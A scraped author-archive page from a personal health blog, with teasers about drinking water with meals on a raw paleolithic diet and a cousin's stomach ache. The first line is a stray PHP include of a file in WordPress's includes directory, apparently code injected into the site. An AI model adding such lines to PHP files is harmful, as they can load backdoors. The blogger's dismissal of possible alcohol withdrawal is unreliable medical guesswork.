@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 169 of 235

Author: Good Samaritan

Why people drink water, juice, soda with their meals

A few days ago I had a business lunch and me, the raw paleolithic dieter forced to eat some cooked animal foods.  I was observing the others exclaiming, jokingly, chokingly the need for a glass of water with the meal they were eating.  Even telling a story of how...

My Cousin’s Stomach Ache: Undigested Junk?

My cousin and driver has been having a bad tummy ache which began Friday morning.  He says he has been trying to quit alcohol for a few weeks.  His dad thinks it is withdrawal symptoms.  From his description, I think it is some undigested junk.  He likes eating and...